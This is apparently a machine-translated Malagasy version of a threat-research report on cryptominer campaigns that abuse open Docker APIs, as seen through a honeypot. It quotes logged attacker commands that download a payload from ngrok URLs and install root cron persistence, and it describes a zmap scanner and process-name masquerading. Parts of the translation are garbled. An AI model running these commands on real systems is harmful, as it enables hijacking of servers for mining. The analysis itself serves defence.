Nanadihady ny angon-drakitra nangonina tamin'ny alalan'ny kaontenera honeypot izahay, izay noforoninay hanaraha-maso ny fandrahonana. Ary nahita hetsika manan-danja avy amin'ireo mpitrandraka kriptocurrency tsy niriana na tsy nahazoana alalana napetraka ho kaontenera jiolahy mampiasa sary navoakan'ny vondrom-piarahamonina ao amin'ny Docker Hub. Ny sary dia ampiasaina ho ampahany amin'ny serivisy manolotra mpitrandraka cryptocurrency ratsy.
Fanampin'izany, napetraka ny programa hiarahana amin'ny tambajotra mba hidirana amin'ireo kaontenera sy fampiharana mifanakaiky.
Avelantsika ho toy ny misy ny tantely, izany hoe, miaraka amin'ny fikandrana default, tsy misy fepetra fiarovana na fametrahana rindrambaiko fanampiny. Mariho fa ny Docker dia manana tolo-kevitra momba ny fananganana voalohany mba hisorohana ny fahadisoana sy ny vulnerability tsotra. Fa ny fitoeran-tantely ampiasaina dia kaontenera, natao hamantarana ny fanafihana natao ho an'ny sehatry ny containerization, fa tsy ny fampiharana ao anaty container.
Ny hetsika ratsy hita dia misongadina ihany koa satria tsy mitaky vulnerability ary tsy miankina amin'ny dikan-Docker ihany koa. Ny fitadiavana sarin'ny kaontenera tsy voarindra, ary noho izany dia misokatra, ny hany ilain'ny mpanafika hamindra ny lohamilina misokatra.
Ny Docker API tsy voahidy dia ahafahan'ny mpampiasa manao karazany maro , ao anatin'izany ny fahazoana lisitry ny kaontenera mandeha, ny fahazoana diary avy amina kaontenera iray manokana, ny fanombohana, ny fijanonana (anisan'izany ny fanerena) ary na ny famoronana fitoerana vaovao avy amin'ny sary iray manokana miaraka amin'ny filaharana voafaritra.
Eo ankavia ny fomba fandefasana malware. Eo amin'ny ankavanana ny tontolon'ny mpanafika, izay mamela ny famoahana sary avy lavitra.
Fizarana amin'ny firenena misy 3762 Open Docker API. Miorina amin'ny fikarohana Shodan tamin'ny 12.02.2019/XNUMX/XNUMX
Safidin'ny rojo fanafihana sy entana
Ny asa ratsy dia hita fa tsy tamin'ny fanampian'ny tantely ihany. Ny angon-drakitra avy amin'i Shodan dia mampiseho fa nitombo ny isan'ny Docker APIs (jereo ny tabilao faharoa) hatramin'ny nanadihadianay ny kaontenera diso fampiasa ho tetezana hametrahana rindrambaiko fitrandrahana cryptocurrency Monero. Tamin'ny Oktobra tamin'ny taon-dasa (2018, angon-drakitra ankehitriny eo ho eo MPANDIKA TENY) tsy nisy afa-tsy 856 API misokatra.
Ny fandinihana ny diarin'ny honeypot dia hita fa misy ifandraisany amin'ny fampiasana ny sarin'ny kaontenera ihany koa . Izany dia ahafahan'ny mpanafika mamorona URL mavitrika rehefa mandefa entana amin'ny mpizara misokatra. Ireto ambany ireto ny ohatra kaody avy amin'ny diary mampiseho fanararaotana ny serivisy ngrok:
Tty: false
Command: “-c curl –retry 3 -m 60 -o /tmp9bedce/tmp/tmpfilece427fe0eb0426d997cb0455f9fbd283d ”hxxp://12f414f1[.]ngrok[.]io/f/serve?l=d&r=ce427fe0eb0426d997cb0455f9fbd283”;echo ”* * * * * root sh /tmp/tmpfilece427fe0eb0426d997cb0455f9fbd283d” >/tmp9bedce/etc/crontab;echo ”* * * * * root sh /tmp/tmpfilece427fe0eb0426d997cb0455f9fbd283d” >/tmp9bedce/etc/cron.d/1m;chroot /tmp9bedce sh -c ”cron || crond””,
Entrypoint: “/bin/sh”
Tty: false,
Command: “-c curl –retry 3 -m 60 -o /tmp570547/tmp/tmpfilece427fe0eb0426d997cb0455f9fbd283d ”hxxp://5249d5f6[.]ngrok[.]io/f/serve?l=d&r=ce427fe0eb0426d997cb0455f9fbd283”;echo ”* * * * * root sh /tmp/tmpfilece427fe0eb0426d997cb0455f9fbd283d” >/tmp570547/etc/crontab;echo ”* * * * * root sh /tmp/tmpfilece427fe0eb0426d997cb0455f9fbd283d” >/tmp570547/etc/cron.d/1m;chroot /tmp570547 sh -c ”cron || crond””,
Entrypoint: “/bin/sh”
Tty: false,
Command: “-c curl –retry 3 -m 60 -o /tmp326c80/tmp/tmpfilece427fe0eb0426d9aa8e1b9ec086e4eed ”hxxp://b27562c1[.]ngrok[.]io/f/serve?l=d&r=ce427fe0eb0426d9aa8e1b9ec086e4ee”;echo ”* * * * * root sh /tmp/tmpfilece427fe0eb0426d9aa8e1b9ec086e4eed” >/tmp326c80/etc/crontab;echo ”* * * * * root sh /tmp/tmpfilece427fe0eb0426d9aa8e1b9ec086e4eed” >/tmp326c80/etc/cron.d/1m;chroot /tmp326c80 sh -c ”cron || crond””,
Entrypoint: “/bin/sh”,
Tty: false,
Cmd: “-c curl –retry 3 -m 60 -o /tmp8b9b5b/tmp/tmpfilece427fe0eb0426d9aa8e1b9ec086e4eed ”hxxp://f30c8cf9[.]ngrok[.]io/f/serve?l=d&r=ce427fe0eb0426d9aa8e1b9ec086e4ee”;echo ”* * * * * root sh /tmp/tmpfilece427fe0eb0426d9aa8e1b9ec086e4eed” >/tmp8b9b5b/etc/crontab;echo ”* * * * * root sh /tmp/tmpfilece427fe0eb0426d9aa8e1b9ec086e4eed” >/tmp8b9b5b/etc/cron.d/1m;chroot /tmp8b9b5b sh -c ”cron || crond””,
Entrypoint: “/bin/sh”Araka ny hitanao, ny rakitra nampidirina dia alaina avy amin'ny URL miova tsy tapaka. Ireo URL ireo dia manana daty lany daty fohy, ka tsy azo alaina ny enta-mavesatra aorian'ny daty lany daty.
Misy safidy roa tonta. Ny voalohany dia mpitrandraka ELF natambatra ho an'ny Linux (voafaritra ho Coinminer.SH.MALXMR.ATNO) izay mifandray amin'ny dobo fitrandrahana. Ny faharoa dia script (TrojanSpy.SH.ZNETMAP.A) natao hahazoana fitaovana tambajotra sasany ampiasaina hijerena ny sahan'ny tambajotra ary avy eo hikaroka tanjona vaovao.
Ny script dropper dia mametraka variables roa, izay ampiasaina amin'ny fametrahana ny mpitrandraka cryptocurrency. Ny fari-piadidiana HOST dia ahitana ny URL misy ireo rakitra maloto, ary ny fari-piadidiana RIP dia ny anaran-drakitra (raha ny marina, ny hash) an'ny mpitrandraka hapetraka. Ny fiovan'ny HOST dia miova isaky ny miova ny fiovan'ny hash. Ny script koa dia manandrana manamarina fa tsy misy mpitrandraka cryptocurrency hafa mandeha amin'ny mpizara voatafika.
Ohatra amin'ny variable HOST sy RIP, ary koa sombin-kaody ampiasaina hanamarinana fa tsy misy mpitrandraka hafa mandeha.
Alohan'ny hanombohana ny mpitrandraka dia novaina ho nginx. Ny dikan-teny hafa amin'ity script ity dia manonona anarana ny mpitrandraka amin'ny serivisy ara-dalàna hafa izay mety misy amin'ny tontolo Linux. Matetika izany dia ampy handosirana ny fisavana amin'ny lisitry ny dingana mandeha.
Manana endri-javatra ihany koa ny script fikarohana. Izy io dia miasa miaraka amin'ny serivisy URL mitovy amin'ny fametrahana ireo fitaovana ilaina. Anisan'izany ny zmap binary, izay ampiasaina hijerena tambajotra sy hahazoana lisitry ny seranana misokatra. Ny script koa dia mametaka binary hafa izay ampiasaina hifaneraserana amin'ireo serivisy hita ary handraisana sora-baventy avy amin'izy ireo mba hamaritana fampahalalana fanampiny momba ny serivisy hita (ohatra, ny dikan-ny).
Ny script ihany koa dia mamaritra mialoha ny tambajotra sasany hojerena, saingy miankina amin'ny dikan'ny script izany. Izy io koa dia mametraka ny seranan-tsambo kendrena amin'ny serivisy - amin'ity tranga ity, Docker - alohan'ny hanaovana ny scan.
Raha vantany vao hita ny lasibatra azo atao dia esorina ho azy ireo ny sora-baventy. Ny script koa dia manivana ireo kendrena miankina amin'ny serivisy, fampiharana, singa na sehatra mahaliana: Redis, Jenkins, Drupal, MODX, , mpanjifa Docker 1.16 ary Apache CouchDB. Raha mifanandrify amin'ny iray amin'izy ireo ny mpizara notarafina, dia voatahiry ao anaty rakitra an-tsoratra izy io, izay azon'ny mpanafika ampiasaina amin'ny famakafakana sy fijirika manaraka. Ireo rakitra lahatsoratra ireo dia ampidirina amin'ny lohamilin'ny mpanafika amin'ny alàlan'ny rohy mavitrika. Izany hoe, URL mitokana no ampiasaina ho an'ny rakitra tsirairay, izay midika fa sarotra ny fidirana manaraka.
Ny vector fanafihana dia sary Docker, araka ny hita ao amin'ny kaody roa manaraka.
Eo an-tampony dia manova anarana ho serivisy ara-dalàna, ary eo ambany ny fomba fampiasana ny zmap hijerena tambajotra.
Eo an-tampony dia misy tambajotram-pifandraisana efa voafaritra mialoha, ao ambany dia misy seranana manokana hikaroka serivisy, anisan'izany ny Docker
Ny pikantsary dia mampiseho fa efa in-10 tapitrisa mahery no nakarina ilay sary alpine-curl
Miorina amin'ny Alpine Linux sy curl, fitaovana CLI mahomby amin'ny famindràna rakitra amin'ny protocols isan-karazany, azonao atao ny manangana. . Araka ny hitanao amin'ny sary teo aloha dia efa in-10 tapitrisa mahery no nakarina ity sary ity. Ny fampidinana be dia be dia mety midika fa mampiasa ity sary ity ho toerana idirana; enim-bolana mahery no nohavaozina ity sary ity; tsy naka sary hafa tao amin'ity tahiry ity matetika ny mpampiasa. Ao amin'ny Docker - toromarika ampiasaina hanamboarana kaontenera iray hampandehanana azy. Raha diso ny firafitry ny teboka fidirana (ohatra, avela misokatra amin'ny Internet ny fitoeran-javatra), dia azo ampiasaina ho vector fanafihana ilay sary. Ny mpanafika dia afaka mampiasa azy io mba handefasana entana raha mahita fitoeran-javatra diso na misokatra tsy misy tohana.
Zava-dehibe ny manamarika fa ity sary (alpine-curl) ity dia tsy manimba, fa araka ny hitanao etsy ambony, dia azo ampiasaina hanaovana asa ratsy. Ny sary Docker mitovy amin'izany dia azo ampiasaina hanaovana asa ratsy ihany koa. Nifandray tamin'i Docker izahay ary niara-niasa tamin'izy ireo momba ity olana ity.
tolo-kevitra
sisa tavela ho an'ny orinasa maro, indrindra fa ny fampiharana , mifantoka amin'ny fampandrosoana haingana sy ny fanaterana. Miharatsy ny zava-drehetra noho ny filàna fanarahana ny fitsipika fanaraha-maso sy fanaraha-maso, ny filàna fanaraha-maso ny tsiambaratelon'ny angon-drakitra, ary koa ny fahasimbana goavana amin'ny tsy fanarahan-dalàna. Ny fampidirana automatique fiarovana ao anatin'ny tsingerin'ny fiainan'ny fampandrosoana dia tsy vitan'ny hoe manampy anao hahita lavaka fiarovana izay mety tsy ho hita raha tsy izany, fa manampy anao koa hampihena ny enta-mavesatra tsy ilaina, toy ny fampandehanana rindrambaiko fanampiny ho an'ny vulnerable tsirairay hita na diso konfigurasi aorian'ny fametrahana fampiharana.
Ny zava-nitranga resahina ato amin'ity lahatsoratra ity dia manasongadina ny ilàna ny fitandremana ny fiarovana hatrany am-piandohana, ao anatin'izany ireto soso-kevitra manaraka ireto:
- Ho an'ny mpandrindra sy mpamorona rafitra: Jereo foana ny firafitry ny API-nao mba hahazoana antoka fa voarindra avokoa ny zavatra rehetra mba hanaiky ny fangatahana avy amin'ny mpizara manokana na tambajotra anatiny ihany.
- Araho ny fitsipiky ny zo faran'izay kely indrindra: ho azo antoka fa voasonia sy voamarina ny sarin'ny kaontenera, ferana ny fidirana amin'ireo singa manan-danja (serivisy fandefasana entana) ary ampio fanafenana amin'ny fifandraisana amin'ny tambajotra.
- Araho ary avelao ny rafitra fiarovana, oh. ary naorina-in .
- Mampiasà fitarafana mandeha ho azy amin'ny fotoam-pivoriana sy sary mba hahazoana fampahalalana fanampiny momba ny dingana mandeha ao amin'ny kaontenera (ohatra, mba hamantarana ny fanodikodinam-bola na ny fitadiavana ireo vulnerable). Ny fanaraha-maso ny fampiharana sy ny fanaraha-maso ny fahamendrehana dia manampy amin'ny fanaraha-maso ny fiovana tsy ara-dalàna amin'ny lohamilina, ny rakitra ary ny faritra misy rafitra.
Ny Trendmicro dia manampy ny ekipa DevOps hanorina azo antoka, hivoaka haingana ary hanomboka na aiza na aiza. Trend Micro Manome fiarovana matanjaka, mirindra ary mandeha ho azy manerana ny fantsona DevOps an'ny fikambanana ary manome fiarovana fandrahonana marobe mba hiarovana ny enta-mavesatra ara-batana, virtoaly ary rahona mandritra ny fotoana fiasana. Manampy fiarovana amin'ny container miaraka amin'ny и , izay mijery ny sarin'ny container Docker ho an'ny malware sy ny vulnerability amin'ny fotoana rehetra ao amin'ny fantsona fampandrosoana mba hisorohana ny fandrahonana alohan'ny hametrahana azy ireo.
Famantarana ny marimaritra iraisana
Hash mifandraika:
- 54343fd1555e1f72c2c1d30369013fb40372a88875930c71b8c3a23bbe5bb15e (Coinminer.SH.MALXMR.ATNO)
- f1e53879e992771db6045b94b3f73d11396fbe7b3394103718435982a7161228 (TrojanSpy.SH.ZNETMAP.A)
amin'ny Asehon'ireo mpandahateny manao fanazaran-tena hoe inona no toe-javatra tokony hatao aloha mba hampihenana ny mety hitranga na hialana tanteraka amin'ny fisehoan-javatra voalaza etsy ambony. Ary tamin'ny 19-21 aogositra tao amin'ny Internet intensive Azonao atao ny mifanakalo hevitra momba ireo olana ireo sy ny olana ara-piarovana mitovy amin'izany miaraka amin'ny mpiara-miasa sy ny mpampianatra zatra eo amin'ny latabatra boribory, izay ahafahan'ny tsirairay miteny sy mihaino ny fanaintainana sy ny fahombiazan'ny mpiara-miasa efa za-draharaha.
Source: www.habr.com